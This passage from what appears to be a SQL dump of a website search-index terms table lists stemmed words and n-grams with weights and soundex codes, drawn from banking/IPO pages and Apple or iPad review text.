data',0,1,1.3667,'T000',1,'en'),(13674,'to the ipo','to the ipo',0,1,1.3333,'T100',1,'en'),(13675,'transaction','transact',0,0,0.7333,'T65235',1,'en'),(13676,'transaction manual','transact manual',0,1,1.6,'T652354',1,'en'),(13677,'transaction manual and','transact manual and',0,1,1.7333,'T65235453',1,'en'),(13678,'upload','upload',0,0,0.4,'U143',2,'en'),(13679,'upload export','upload export',0,1,1.4333,'U1432163',1,'en'),(13680,'upload export b','upload export b',0,1,1.5,'U14321631',1,'en'),(13681,'user entered','user entered',0,1,1.4,'U265363',1,'en'),(13682,'user entered the','user entered the',0,1,1.5333,'U265363',1,'en'),(13683,'validated','valid',0,0,0.6,'V430',1,'en'),(13684,'validated and','valid and',0,1,1.4333,'V4353',1,'en'),(13685,'validation','valid',0,0,0.6667,'V435',1,'en'),(13686,'validation and','valid and',0,1,1.4667,'V4353',1,'en'),(13687,'validation and approval','valid and approval',0,1,1.7667,'V43531614',1,'en'),(13688,'validity','valid',0,0,0.5333,'V430',1,'en'),(13689,'validity of','valid of',0,1,1.3667,'V431',1,'en'),(13690,'validity of their','valid of their',0,1,1.5667,'V43136',1,'en'),(13691,'verify','verifi',0,0,0.4,'V610',1,'en'),(13692,'verify his','verifi his',0,1,1.3333,'V612',1,'en'),(13693,'verify his entry','verifi his entry',0,1,1.5333,'V612536',1,'en'),(13694,'view','view',0,0,0.2667,'V000',4,'en'),(13695,'view and','view and',0,1,1.2667,'V530',1,'en'),(13696,'view and verify','view and verify',0,1,1.5,'V53161',1,'en'),(13697,'wide','wide',1,0,0.0333,'W300',3,'en'),(13698,'wide range','wide range',0,1,1.3333,'W3652',1,'en'),(13699,'wide range of','wide range of',0,1,1.4333,'W36521',1,'en'),(13700,'will be','will be',0,1,1.2333,'W410',10,'en'),(13701,'will be saved','will be saved',0,1,1.4333,'W41213',1,'en'),(13702,'will be sent','will be sent',0,1,1.4,'W41253',2,'en'),(13703,'will eliminate','will eliminate',0,1,1.4667,'W453',1,'en'),(13704,'will eliminate the','will eliminate the',0,1,1.6,'W453',1,'en'),(13705,'127','127',0,0,0.3,'',1,'en'),(13706,'ipo manager 2','ipo manager 2',0,1,1.4333,'I1526',1,'en'),(13707,'manager 2','manag 2',0,1,1.3,'M260',1,'en'),(13733,'130','130',0,0,0.3,'',2,'en'),(13742,'131','131',0,0,0.3,'',1,'en'),(13743,'5','5',0,0,0.1,'',5,'en'),(13744,'bank dubi','bank dubi',0,1,1.3,'B5231',1,'en'),(13745,'bankdubi','bankdubi',0,0,0.5333,'B5231',1,'en'),(13746,'business pages 5','busi pages 5',0,1,1.5333,'B25212',1,'en'),(13747,'dubi','dubi',0,0,0.2667,'D100',1,'en'),(13748,'pages 5','page 5',0,1,1.2333,'P200',1,'en'),(13757,'adcb','adcb',0,0,0.2667,'A321',2,'en'),(13762,'commercial','commerci',0,0,0.6667,'C5624',4,'en'),(13774,'accounts','account',0,0,0.5333,'A2532',1,'en'),(13820,'latest','latest',0,0,0.4,'L323',1,'en'),(13826,'maker','maker',0,0,0.3333,'M260',2,'en'),(13871,'a full','a full',0,1,1.2,'A140',1,'en'),(13875,'a result','a result',0,1,1.2667,'A6243',3,'en'),(13876,'a result of','a result of',0,1,1.3667,'A62431',2,'en'),(13877,'above','abov',0,0,0.3333,'A100',1,'en'),(13912,'and with','and with',0,1,1.2667,'A530',1,'en'),(13913,'and with the','and with the',0,1,1.4,'A530',1,'en'),(13920,'arm','arm',0,0,0.2,'A650',1,'en'),(13923,'as a result','as a result',0,1,1.3667,'A26243',3,'en'),(13924,'as an','as an',0,1,1.1667,'A250',2,'en'),(13927,'at the','at the',0,1,1.2,'A300',10,'en'),(13932,'being','be',0,0,0.3333,'B520',5,'en'),(13955,'countries','countri',0,0,0.6,'C5362',1,'en'),(13960,'created','creat',0,0,0.4667,'C630',4,'en'),(13975,'due','due',0,0,0.2,'D000',4,'en'),(13976,'due to','due to',0,1,1.2,'D000',3,'en'),(13978,'efficient','effici',0,0,0.6,'E1253',1,'en'),(14006,'executed','execut',0,0,0.5333,'E230',1,'en'),(14011,'expert','expert',0,0,0.4,'E2163',1,'en'),(14016,'fair','fair',0,0,0.2667,'F600',1,'en'),(14034,'full','full',0,0,0.2667,'F400',3,'en'),(14040,'going','go',0,0,0.3333,'G520',5,'en'),(14043,'growth','growth',0,0,0.4,'G630',2,'en'),(14046,'help','help',0,0,0.2667,'H410',4,'en'),(14101,'job','job',0,0,0.2,'J100',1,'en'),(14107,'leading','lead',0,0,0.4667,'L352',1,'en'),(14110,'listed','list',0,0,0.4,'L230',2,'en'),(14116,'local','local',0,0,0.3333,'L240',2,'en'),(14129,'managing','manag',0,0,0.5333,'M252',1,'en'),(14143,'needed','need',0,0,0.4,'N300',3,'en'),(14146,'number','number',0,0,0.4,'N160',1,'en'),(14149,'numbers','number',0,0,0.4667,'N162',1,'en'),(14150,'numbers of','number of',0,1,1.3333,'N1621',1,'en'),(14170,'operations','oper',0,0,0.6667,'O16352',1,'en'),(14173,'or to','or to',0,1,1.1667,'O630',1,'en'),(14183,'other countries','other countries',0,1,1.5,'O3625362',1,'en'),(14188,'place','place',0,0,0.3333,'P420',6,'en'),(14199,'procedures','procedur',0,0,0.6667,'P62362',1,'en'),(14213,'regulations','regul',0,0,0.7333,'R24352',1,'en'),(14219,'responsible','respons',0,0,0.7333,'R215214',1,'en'),(14220,'responsible for','respons for',0,1,1.5,'R21521416',1,'en'),(14222,'result','result',0,0,0.4,'R243',3,'en'),(14223,'result of','result of',0,1,1.3,'R2431',2,'en'),(14225,'running','run',0,0,0.4667,'R520',1,'en'),(14244,'structure','structur',0,0,0.6,'S36236',2,'en'),(14257,'that is','that is',0,1,1.2333,'T200',6,'en'),(14261,'the above','the above',0,1,1.3,'T100',1,'en'),(14281,'the stock','the stock',0,1,1.3,'T232',1,'en'),(14285,'them','them',1,0,0.0333,'T500',4,'en'),(14288,'through an','through an',0,1,1.3333,'T625',1,'en'),(14300,'to that','to that',0,1,1.2333,'T000',1,'en'),(14314,'ü','ü',0,0,0.0667,'ü000',3,'en'),(14318,'various','variou',0,0,0.4667,'V620',4,'en'),(14329,'why','why',1,0,0.025,'W000',3,'en'),(14331,'will help','will help',0,1,1.3,'W410',1,'en'),(14335,'within','within',1,0,0.05,'W350',4,'en'),(14336,'within the','within the',0,1,1.3333,'W353',2,'en'),(14375,'6','6',0,0,0.1,'',3,'en'),(14376,'60','60',0,0,0.2,'',2,'en'),(14385,'already','alreadi',0,0,0.4667,'A463',3,'en'),(14407,'area','area',0,0,0.2667,'A600',7,'en'),(14415,'besides','besid',0,0,0.4667,'B232',2,'en'),(14419,'built','built',0,0,0.3333,'B430',2,'en'),(14444,'customers','custom',0,0,0.6,'C3562',3,'en'),(14460,'delivered','deliv',0,0,0.6,'D4163',2,'en'),(14470,'development','develop',0,0,0.7333,'D14153',2,'en'),(14482,'every','everi',0,0,0.3333,'E160',11,'en'),(14507,'for any','for any',0,1,1.2333,'F650',4,'en'),(14509,'four','four',0,0,0.2667,'F600',4,'en'),(14535,'keeping','keep',0,0,0.4667,'K152',2,'en'),(14543,'light','light',0,0,0.3333,'L230',2,'en'),(14642,'requirement','requir',0,0,0.7333,'R2653',2,'en'),(14676,'symbol','symbol',0,0,0.4,'S514',1,'en'),(14683,'technical','technic',0,0,0.6,'T2524',2,'en'),(14688,'the company','the company',0,1,1.3667,'T2515',2,'en'),(14711,'type','type',0,0,0.2667,'T100',5,'en'),(14712,'type of','type of',0,1,1.2333,'T100',3,'en'),(15553,'all','all',1,0,0.025,'A400',12,'en'),(15588,'courses','cours',0,0,0.4667,'C620',1,'en'),(15591,'custody','custodi',0,0,0.4667,'C300',1,'en'),(15594,'delivery','deliveri',0,0,0.5333,'D416',1,'en'),(15608,'employees','employe',0,0,0.6,'E5142',2,'en'),(15646,'individuals','individu',0,0,0.7333,'I531342',4,'en'),(15664,'j','j',0,0,0.0667,'J000',2,'en'),(15668,'k','k',0,0,0.0667,'K000',1,'en'),(15671,'l','l',0,0,0.0667,'L000',4,'en'),(15673,'m','m',0,0,0.0667,'M000',1,'en'),(15683,'members','member',0,0,0.4667,'M162',1,'en'),(15703,'o','o',0,0,0.0667,'O000',3,'en'),(15718,'p','p',0,0,0.0667,'P000',1,'en'),(15726,'program','program',0,0,0.4667,'P6265',2,'en'),(15727,'project','project',0,0,0.4667,'P623',2,'en'),(15740,'r','r',0,0,0.0667,'R000',1,'en'),(15754,'s','s',0,0,0.0667,'S000',5,'en'),(15774,'strategy','strategi',0,0,0.5333,'S3632',1,'en'),(15784,'t','t',0,0,0.0667,'T000',2,'en'),(15796,'training','train',0,0,0.5333,'T652',1,'en'),(15812,'x','x',0,0,0.0667,'X000',2,'en'),(15813,'y','y',0,0,0.0667,'Y000',4,'en'),(15834,'7','7',0,0,0.1,'',6,'en'),(15844,'8','8',0,0,0.1,'',4,'en'),(15866,'1.apple','1.appl',0,0,0.4667,'A140',1,'en'),(15867,'1.apple has','1.appl has',0,1,1.3667,'A142',1,'en'),(15868,'1.apple has never','1.appl has never',0,1,1.5667,'A142516',1,'en'),(15869,'10','10',0,0,0.2,'',7,'en'),(15870,'139','139',0,0,0.3,'',1,'en'),(15871,'2 furthermore','2 furthermore',0,1,1.4333,'F63656',1,'en'),(15872,'2 furthermore 4','2 furthermore 4',0,1,1.5,'F63656',1,'en'),(15873,'2.apple\'s','2.appl',0,0,0.6,'A142',1,'en'),(15874,'2.apple\'s current','2.appl current',0,1,1.5667,'A142653',1,'en'),(15875,'2.apple\'s current approach','2.appl current approach',0,1,1.8667,'A142653162',1,'en'),(15876,'27','27',0,0,0.2,'',2,'en'),(15877,'27 years','27 years',0,1,1.2667,'Y620',1,'en'),(15878,'27 years in','27 years in',0,1,1.3667,'Y625',1,'en'),(15879,'3.apple','3.appl',0,0,0.4667,'A140',1,'en'),(15880,'3.apple still','3.appl still',0,1,1.4333,'A14234',1,'en'),(15881,'3.apple still makes','3.appl still makes',0,1,1.6333,'A1423452',1,'en'),(15882,'4 as','4 as',0,1,1.1333,'A200',1,'en'),(15883,'4 as wife','4 as wife',0,1,1.3,'A210',1,'en'),(15884,'4.the','4.the',0,0,0.3333,'T000',1,'en'),(15885,'4.the techies','4.the techies',0,1,1.4333,'T200',1,'en'),(15886,'4.the techies are','4.the techies are',0,1,1.5667,'T260',1,'en'),(15887,'5.vertical','5.vertic',0,0,0.6667,'V6324',1,'en'),(15888,'5.vertical branded','5.vertic branded',0,1,1.6,'V63241653',1,'en'),(15889,'5.vertical branded news','5.vertic branded news',0,1,1.7667,'V6324165352',1,'en'),(15890,'9 piece','9 piece',0,1,1.2333,'P200',1,'en'),(15891,'9 piece of','9 piece of',0,1,1.3333,'P210',1,'en'),(15892,'a 9','a 9',0,1,1.1,'A000',1,'en'),(15893,'a 9 piece','a 9 piece',0,1,1.3,'A120',1,'en'),(15894,'a clever','a clever',0,1,1.2667,'A2416',1,'en'),(15895,'a clever solution','a clever solution',0,1,1.5667,'A24162435',1,'en'),(15896,'a computer','a computer',0,1,1.3333,'A25136',1,'en'),(15897,'a computer remotely','a computer remotely',0,1,1.6333,'A25136534',1,'en'),(15898,'a core','a core',0,1,1.2,'A260',2,'en'),(15899,'a core of','a core of',0,1,1.3,'A261',1,'en'),(15900,'a culture','a culture',0,1,1.3,'A2436',1,'en'),(15901,'a culture shift','a culture shift',0,1,1.5,'A2436213',1,'en'),(15902,'a day','a day',0,1,1.1667,'A300',1,'en'),(15903,'a day after','a day after',0,1,1.3667,'A3136',1,'en'),(15904,'a from','a from',0,1,1.2,'A165',1,'en'),(15905,'a from command','a from command',0,1,1.4667,'A165253',1,'en'),(15906,'a full computer','a full computer',0,1,1.5,'A1425136',1,'en'),(15907,'a generation','a generation',0,1,1.4,'A25635',1,'en'),(15908,'a generation of','a generation of',0,1,1.5,'A256351',1,'en'),(15909,'a good','a good',0,1,1.2,'A230',2,'en'),(15910,'a good pc','a good pc',0,1,1.3,'A2312',1,'en'),(15911,'a good start','a good start',0,1,1.4,'A232363',1,'en'),(15912,'a laptop','a laptop',0,1,1.2667,'A4131',1,'en'),(15913,'a laptop then','a laptop then',0,1,1.4333,'A413135',1,'en'),(15914,'a lot','a lot',0,1,1.1667,'A430',5,'en'),(15915,'a lot of','a lot of',0,1,1.2667,'A431',4,'en'),(15916,'a meager','a meager',0,1,1.2667,'A526',1,'en'),(15917,'a meager two','a meager two',0,1,1.4,'A5263',1,'en'),(15918,'a more','a more',0,1,1.2,'A560',1,'en'),(15919,'a more efficient','a more efficient',0,1,1.5333,'A561253',1,'en'),(15920,'a netbook','a netbook',0,1,1.3,'A5312',1,'en'),(15921,'a netbook you','a netbook you',0,1,1.4333,'A5312',1,'en'),(15922,'a savior','a savior',0,1,1.2667,'A216',1,'en'),(15923,'a savior of','a savior of',0,1,1.3667,'A2161',1,'en'),(15924,'a stand','a stand',0,1,1.2333,'A2353',1,'en'),(15925,'a stand anyway','a stand anyway',0,1,1.4667,'A23535',1,'en'),(15926,'a table','a table',0,1,1.2333,'A314',1,'en'),(15927,'a table i','a table i',0,1,1.3,'A314',1,'en'),(15928,'a tractor','a tractor',0,1,1.3,'A36236',1,'en'),(15929,'a tractor trailer','a tractor trailer',0,1,1.5667,'A362363646',1,'en'),(15930,'a traditional','a traditional',0,1,1.4333,'A36354',1,'en'),(15931,'a traditional main','a traditional main',0,1,1.6,'A363545',1,'en'),(15932,'a way','a way',0,1,1.1667,'A000',2,'en'),(15933,'a way to','a way to',0,1,1.2667,'A300',1,'en'),(15934,'able','abl',0,0,0.2667,'A140',6,'en'),(15935,'able to','abl to',0,1,1.2333,'A143',6,'en'),(15936,'able to witness','abl to witness',0,1,1.5,'A14352',1,'en'),(15937,'abnormally','abnorm',0,0,0.6667,'A15654',1,'en'),(15938,'abnormally long','abnorm long',0,1,1.5,'A1565452',1,'en'),(15939,'abnormally long thumbs','abnorm long thumbs',0,1,1.7333,'A15654523512',1,'en'),(15940,'about computers','about computers',0,1,1.5,'A13251362',1,'en'),(15941,'about computers are','about computers are',0,1,1.6333,'A132513626',1,'en'),(15942,'about viruses','about viruses',0,1,1.4333,'A13162',1,'en'),(15943,'about viruses and','about viruses and',0,1,1.5667,'A1316253',1,'en'),(15944,'abyss','abyss',0,0,0.3333,'A120',1,'en'),(15945,'abyss as','abyss as',0,1,1.2667,'A120',1,'en'),(15946,'abyss as it','abyss as it',0,1,1.3667,'A123',1,'en'),(15947,'access','access',0,0,0.4,'A200',2,'en'),(15948,'access unusual','access unusual',0,1,1.4667,'A2524',1,'en'),(15949,'access unusual pages','access unusual pages',0,1,1.6667,'A252412',1,'en'),(15950,'accused','accus',0,0,0.4667,'A230',1,'en'),(15951,'accused of','accus of',0,1,1.3333,'A231',1,'en'),(15952,'accused of raping','accus of raping',0,1,1.5667,'A2316152',1,'en'),(15953,'active','activ',0,0,0.4,'A231',1,'en'),(15954,'active pages','activ pages',0,1,1.4,'A2312',1,'en'),(15955,'active pages labeled','activ pages labeled',0,1,1.6667,'A23124143',1,'en'),(15956,'actual','actual',0,0,0.4,'A234',3,'en'),(15957,'actual have','actual have',0,1,1.3667,'A2341',1,'en'),(15958,'actual have speed','actual have speed',0,1,1.5667,'A2341213',1,'en'),(15959,'adequate','adequ',0,0,0.5333,'A323',2,'en'),(15960,'adequate amount','adequ amount',0,1,1.5,'A32353',1,'en'),(15961,'adequate amount of','adequ amount of',0,1,1.6,'A323531',1,'en'),(15962,'adjust','adjust',0,0,0.4,'A323',1,'en'),(15963,'adjust to','adjust to',0,1,1.3,'A323',1,'en'),(15964,'adjust to the','adjust to the',0,1,1.4333,'A323',1,'en'),(15965,'admits','admit',0,0,0.4,'A3532',1,'en'),(15966,'admits raping','admit raping',0,1,1.4333,'A35326152',1,'en'),(15967,'admits raping little','admit raping little',0,1,1.6667,'A35326152434',1,'en'),(15968,'advantage','advantag',0,0,0.6,'A31532',1,'en'),(15969,'advantage if','advantag if',0,1,1.4,'A315321',1,'en'),(15970,'advantage if the','advantag if the',0,1,1.5333,'A3153213',1,'en'),(15971,'advertised','advertis',0,0,0.6667,'A316323',1,'en'),(15972,'advertised but','advertis but',0,1,1.4667,'A31632313',1,'en'),(15973,'advertised but your','advertis but your',0,1,1.6333,'A316323136',1,'en'),(15974,'afraid','afraid',0,0,0.4,'A163',1,'en'),(15975,'afraid to','afraid to',0,1,1.3,'A163',1,'en'),(15976,'afraid to move','afraid to move',0,1,1.4667,'A16351',1,'en'),(15977,'after a','after a',0,1,1.2333,'A136',3,'en'),(15978,'after a tractor','after a tractor',0,1,1.5,'A13636236',1,'en'),(15979,'after that','after that',0,1,1.3333,'A1363',2,'en'),(15980,'after that you','after that you',0,1,1.4667,'A1363',1,'en'),(15981,'all multitasking','all multitasking',0,1,1.5333,'A4543252',1,'en'),(15982,'all multitasking complaints','all multitasking complaints',0,1,1.9,'A4543252514532',1,'en'),(15983,'all of','all of',0,1,1.2,'A410',2,'en'),(15984,'all of this','all of this',0,1,1.3667,'A4132',1,'en'),(15985,'all over','all over',0,1,1.2667,'A416',2,'en'),(15986,'all over the','all over the',0,1,1.4,'A4163',2,'en'),(15987,'all pages','all pages',0,1,1.3,'A412',1,'en'),(15988,'all pages and','all pages and',0,1,1.4333,'A41253',1,'en'),(15989,'all pooh','all pooh',0,1,1.2667,'A410',1,'en'),(15990,'all pooh to','all pooh to',0,1,1.3667,'A413',1,'en'),(15991,'all this','all this',0,1,1.2667,'A432',2,'en'),(15992,'all this was','all this was',0,1,1.4,'A432',1,'en'),(15993,'allows','allow',0,0,0.4,'A420',2,'en'),(15994,'allows background','allow background',0,1,1.5667,'A4212653',1,'en'),(15995,'allows background listening','allow background listening',0,1,1.9,'A421265342352',1,'en'),(15996,'almost','almost',0,0,0.4,'A4523',4,'en'),(15997,'almost don\'t','almost don',0,1,1.4,'A452353',1,'en'),(15998,'almost don\'t notice','almost don notice',0,1,1.6333,'A452353532',1,'en'),(15999,'alramz','alramz',0,0,0.4,'A4652',1,'en'),(16000,'already covered','alreadi covered',0,1,1.5,'A4632163',1,'en'),(16001,'already covered in','alreadi covered in',0,1,1.6,'A46321635',1,'en'),(16002,'also buy','also buy',0,1,1.2667,'A421',1,'en'),(16003,'also buy apps','also buy apps',0,1,1.4333,'A4212',1,'en'),(16004,'am','am',1,0,0.0167,'A500',5,'en'),(16005,'am not','am not',0,1,1.2,'A530',1,'en'),(16006,'am not a','am not a',0,1,1.2667,'A530',1,'en'),(16007,'among the best','among the best',0,1,1.4667,'A523123',1,'en'),(16008,'amount','amount',0,0,0.4,'A530',6,'en'),(16009,'amount of','amount of',0,1,1.3,'A531',3,'en'),(16010,'amount of that','amount of that',0,1,1.4667,'A5313',1,'en'),(16011,'an adequate','an adequate',0,1,1.3667,'A5323',1,'en'),(16012,'an adequate amount','an adequate amount',0,1,1.6,'A532353',1,'en'),(16013,'an download','an download',0,1,1.3667,'A53543',1,'en'),(16014,'an download and','an download and',0,1,1.5,'A5354353',1,'en'),(16015,'an e','an e',0,1,1.1333,'A500',1,'en'),(16016,'an e mail','an e mail',0,1,1.3,'A540',1,'en'),(16017,'an ipad','an ipad',0,1,1.2333,'A513',1,'en'),(16018,'an ipad app','an ipad app',0,1,1.3667,'A5131',1,'en'),(16019,'an iphone','an iphone',0,1,1.3,'A515',2,'en'),(16020,'an iphone and','an iphone and',0,1,1.4333,'A5153',1,'en'),(16021,'an outlook','an outlook',0,1,1.3333,'A5342',1,'en'),(16022,'an outlook web','an outlook web',0,1,1.4667,'A53421',1,'en'),(16023,'an underrated','an underrated',0,1,1.4333,'A5363',1,'en'),(16024,'an underrated advantage','an underrated advantage',0,1,1.7667,'A53631532',1,'en'),(16025,'and all','and all',0,1,1.2333,'A534',2,'en'),(16026,'and all pages','and all pages',0,1,1.4333,'A53412',1,'en'),(16027,'and cursors','and cursors',0,1,1.3667,'A5326262',1,'en'),(16028,'and cursors to','and cursors to',0,1,1.4667,'A53262623',1,'en'),(16029,'and delay','and delay',0,1,1.3,'A534',1,'en'),(16030,'and delay fine','and delay fine',0,1,1.4667,'A53415',1,'en'),(16031,'and down','and down',0,1,1.2667,'A535',1,'en'),(16032,'and down and','and down and',0,1,1.4,'A5353',1,'en'),(16033,'and fro','and fro',0,1,1.2333,'A5316',1,'en'),(16034,'and fro while','and fro while',0,1,1.4333,'A53164',1,'en'),(16035,'and from','and from',0,1,1.2667,'A53165',1,'en'),(16036,'and from mice','and from mice',0,1,1.4333,'A531652',1,'en'),(16037,'and i','and i',0,1,1.1667,'A530',6,'en'),(16038,'and i don\'t','and i don',0,1,1.3667,'A5353',2,'en'),(16039,'and it\'s','and it',0,1,1.2667,'A532',2,'en'),(16040,'and it\'s a','and it a',0,1,1.3333,'A532',1,'en'),(16041,'and its','and its',0,1,1.2333,'A532',3,'en'),(16042,'and its browser','and its browser',0,1,1.5,'A5321626',1,'en'),(16043,'and not','and not',0,1,1.2333,'A5353',3,'en'),(16044,'and not a','and not a',0,1,1.3,'A5353',1,'en'),(16045,'and now','and now',0,1,1.2333,'A535',1,'en'),(16046,'and now they','and now they',0,1,1.4,'A5353',1,'en'),(16047,'and outstanding','and outstanding',0,1,1.5,'A53235352',1,'en'),(16048,'and outstanding with','and outstanding with',0,1,1.6667,'A532353523',1,'en'),(16049,'and posts','and posts',0,1,1.3,'A531232',1,'en'),(16050,'and posts didn\'t','and posts didn',0,1,1.5333,'A531232353',1,'en'),(16051,'and reuters','and reuters',0,1,1.3667,'A536362',1,'en'),(16052,'and reuters had','and reuters had',0,1,1.5,'A5363623',1,'en'),(16053,'and seamlessly','and seamlessly',0,1,1.4667,'A5325424',1,'en'),(16054,'and seamlessly then','and seamlessly then',0,1,1.6333,'A532542435',1,'en'),(16055,'and some','and some',0,1,1.2667,'A5325',2,'en'),(16056,'and some apps','and some apps',0,1,1.4333,'A532512',1,'en'),(16057,'and sweep','and sweep',0,1,1.3,'A5321',1,'en'),(16058,'and sweep to','and sweep to',0,1,1.4,'A53213',1,'en'),(16059,'and tap','and tap',0,1,1.2333,'A531',1,'en'),(16060,'and tap and','and tap and',0,1,1.3667,'A53153',1,'en'),(16061,'and that\'s','and that',0,1,1.3333,'A532',1,'en'),(16062,'and that\'s an','and that an',0,1,1.4333,'A5325',1,'en'),(16063,'and to','and to',0,1,1.2,'A530',3,'en'),(16064,'and to your','and to your',0,1,1.3667,'A536',1,'en'),(16065,'and touch','and touch',0,1,1.3,'A532',1,'en'),(16066,'and touch screens','and touch screens',0,1,1.5667,'A532652',1,'en'),(16067,'and updates','and updates',0,1,1.3667,'A53132',1,'en'),(16068,'and updates are','and updates are',0,1,1.5,'A531326',1,'en'),(16069,'and you','and you',0,1,1.2333,'A530',3,'en'),(16070,'and you are','and you are',0,1,1.3667,'A536',1,'en'),(16071,'and you like','and you like',0,1,1.4,'A5342',1,'en'),(16072,'and zooming','and zooming',0,1,1.3667,'A53252',1,'en'),(16073,'and zooming builds','and zooming builds',0,1,1.6,'A532521432',1,'en'),(16074,'angle','angl',0,0,0.3333,'A524',1,'en'),(16075,'angle would','angl would',0,1,1.3667,'A5243',1,'en'),(16076,'angle would be','angl would be',0,1,1.4667,'A52431',1,'en'),(16077,'any other','ani other',0,1,1.3,'A536',4,'en'),(16078,'any other app','ani other app',0,1,1.4333,'A5361',1,'en'),(16079,'anyway','anywai',0,0,0.4,'A500',1,'en'),(16080,'anyway resting','anywai resting',0,1,1.4667,'A562352',1,'en'),(16081,'anyway resting you\'ll','anywai resting you',0,1,1.7,'A5623524',1,'en'),(16082,'ap\'s','ap',0,0,0.2667,'A120',1,'en'),(16083,'ap\'s app','ap app',0,1,1.2667,'A121',1,'en'),(16084,'ap\'s app is','ap app is',0,1,1.3667,'A1212',1,'en'),(16085,'app even','app even',0,1,1.2667,'A150',1,'en'),(16086,'app even when','app even when',0,1,1.4333,'A150',1,'en'),(16087,'app had','app had',0,1,1.2333,'A130',1,'en'),(16088,'app had stunning','app had stunning',0,1,1.5333,'A132352',1,'en'),(16089,'app has','app has',0,1,1.2333,'A120',1,'en'),(16090,'app has figured','app has figured',0,1,1.5,'A121263',1,'en'),(16091,'app is','app is',0,1,1.2,'A120',1,'en'),(16092,'app is friendly','app is friendly',0,1,1.5,'A1216534',1,'en'),(16093,'app other','app other',0,1,1.3,'A136',1,'en'),(16094,'app other might','app other might',0,1,1.5,'A136523',1,'en'),(16095,'app so','app so',0,1,1.2,'A120',1,'en'),(16096,'app so quickly','app so quickly',0,1,1.4667,'A124',1,'en'),(16097,'app store','app store',0,1,1.3,'A1236',1,'en'),(16098,'app store popular','app store popular',0,1,1.5667,'A1236146',1,'en'),(16099,'app to','app to',0,1,1.2,'A130',1,'en'),(16100,'app to app','app to app',0,1,1.3333,'A131',1,'en'),(16101,'app to run','app to run',0,1,1.3333,'A1365',1,'en'),(16102,'app was','app was',0,1,1.2333,'A120',1,'en'),(16103,'app was a','app was a',0,1,1.3,'A120',1,'en'),(16104,'appear','appear',0,0,0.4,'A160',2,'en'),(16105,'appear then','appear then',0,1,1.3667,'A1635',1,'en'),(16106,'appear then messages','appear then messages',0,1,1.6667,'A16352',1,'en'),(16107,'apple','appl',0,0,0.3333,'A140',3,'en'),(16108,'apple allows','appl allows',0,1,1.4,'A142',1,'en'),(16109,'apple allows background','appl allows background',0,1,1.7667,'A14212653',1,'en'),(16110,'apple apple','appl apple',0,1,1.3667,'A1414',1,'en'),(16111,'apple apple i-phone\'s','appl apple i-phone',0,1,1.7,'A1414152',1,'en'),(16112,'apple even','appl even',0,1,1.3333,'A1415',1,'en'),(16113,'apple even still','appl even still',0,1,1.5333,'A1415234',1,'en'),(16114,'apple i-phone\'s','appl i-phone',0,1,1.5,'A14152',1,'en'),(16115,'apple i-phone\'s copy','appl i-phone copy',0,1,1.6667,'A141521',1,'en'),(16116,'apple\'s','appl',0,0,0.4667,'A142',1,'en'),(16117,'apple\'s iwork','appl iwork',0,1,1.4333,'A14262',1,'en'),(16118,'apple\'s iwork suite','appl iwork suite',0,1,1.6333,'A142623',1,'en'),(16119,'approach can','approach can',0,1,1.4,'A1625',1,'en'),(16120,'approach can be','approach can be',0,1,1.5,'A16251',1,'en'),(16121,'apps','app',0,0,0.2667,'A120',1,'en'),(16122,'apps and','app and',0,1,1.2667,'A1253',1,'en'),(16123,'apps and not','app and not',0,1,1.4,'A125353',1,'en'),(16124,'apps ap\'s','app ap',0,1,1.3,'A1212',1,'en'),(16125,'apps ap\'s app','app ap app',0,1,1.4333,'A12121',1,'en'),(16126,'apps are','app are',0,1,1.2667,'A126',1,'en'),(16127,'apps are handy','app are handy',0,1,1.4667,'A12653',1,'en'),(16128,'apps are part','app are part',0,1,1.4333,'A126163',1,'en'),(16129,'apps for','app for',0,1,1.2667,'A1216',1,'en'),(16130,'apps for nearly','app for nearly',0,1,1.5,'A1216564',1,'en'),(16131,'apps to','app to',0,1,1.2333,'A123',1,'en'),(16132,'apps to employ','app to employ',0,1,1.4667,'A123514',1,'en'),(16133,'are generally','ar generally',0,1,1.4333,'A62564',4,'en'),(16134,'are generally just','ar generally just',0,1,1.6,'A6256423',1,'en'),(16135,'are handy','ar handy',0,1,1.3,'A653',1,'en'),(16136,'are handy enough','ar handy enough',0,1,1.5333,'A65352',1,'en'),(16137,'are in','ar in',0,1,1.2,'A650',2,'en'),(16138,'are in your','ar in your',0,1,1.3667,'A656',1,'en'),(16139,'are inconvenient','ar inconvenient',0,1,1.5333,'A6525153',1,'en'),(16140,'are inconvenient the','ar inconvenient the',0,1,1.6667,'A6525153',1,'en'),(16141,'are part','ar part',0,1,1.2667,'A6163',1,'en'),(16142,'are part of','ar part of',0,1,1.3667,'A61631',1,'en'),(16143,'are reproduced','ar reproduced',0,1,1.4667,'A616323',1,'en'),(16144,'are reproduced in','ar reproduced in',0,1,1.5667,'A6163235',1,'en'),(16145,'are you','ar you',0,1,1.2333,'A600',1,'en'),(16146,'are you coupled','ar you coupled',0,1,1.5,'A62143',1,'en'),(16147,'as a core','as a core',0,1,1.3,'A260',1,'en'),(16148,'as advertised','as advertised',0,1,1.4333,'A2316323',1,'en'),(16149,'as advertised but','as advertised but',0,1,1.5667,'A231632313',1,'en'),(16150,'as apps','as apps',0,1,1.2333,'A212',1,'en'),(16151,'as apps are','as apps are',0,1,1.3667,'A2126',1,'en'),(16152,'as good','as good',0,1,1.2333,'A230',1,'en'),(16153,'as good as','as good as',0,1,1.3333,'A232',1,'en'),(16154,'as it','as it',0,1,1.1667,'A230',3,'en'),(16155,'as it stares','as it stares',0,1,1.4,'A232362',1,'en'),(16156,'as possibly','as possibly',0,1,1.3667,'A21214',1,'en'),(16157,'as possibly do','as possibly do',0,1,1.4667,'A212143',1,'en'),(16158,'as wife','as wife',0,1,1.2333,'A210',1,'en'),(16159,'as wife held','as wife held',0,1,1.4,'A2143',1,'en'),(16160,'aside','asid',0,0,0.3333,'A230',2,'en'),(16161,'aside the','asid the',0,1,1.3,'A230',1,'en'),(16162,'aside the ideological','asid the ideological',0,1,1.7,'A23424',1,'en'),(16163,'ask','ask',0,0,0.2,'A200',1,'en'),(16164,'ask i\'ll','ask i',0,1,1.2667,'A240',1,'en'),(16165,'ask i\'ll review','ask i review',0,1,1.5,'A2461',1,'en'),(16166,'ask the','ask the',0,1,1.2333,'A230',1,'en'),(16167,'ask the right','ask the right',0,1,1.4333,'A23623',1,'en'),(16168,'assess','assess',0,0,0.4,'A200',1,'en'),(16169,'assess full','assess full',0,1,1.3667,'A214',1,'en'),(16170,'assess full sizemonotasking','assess full sizemonotasking',0,1,1.9,'A214253252',1,'en'),(16171,'at the this','at the 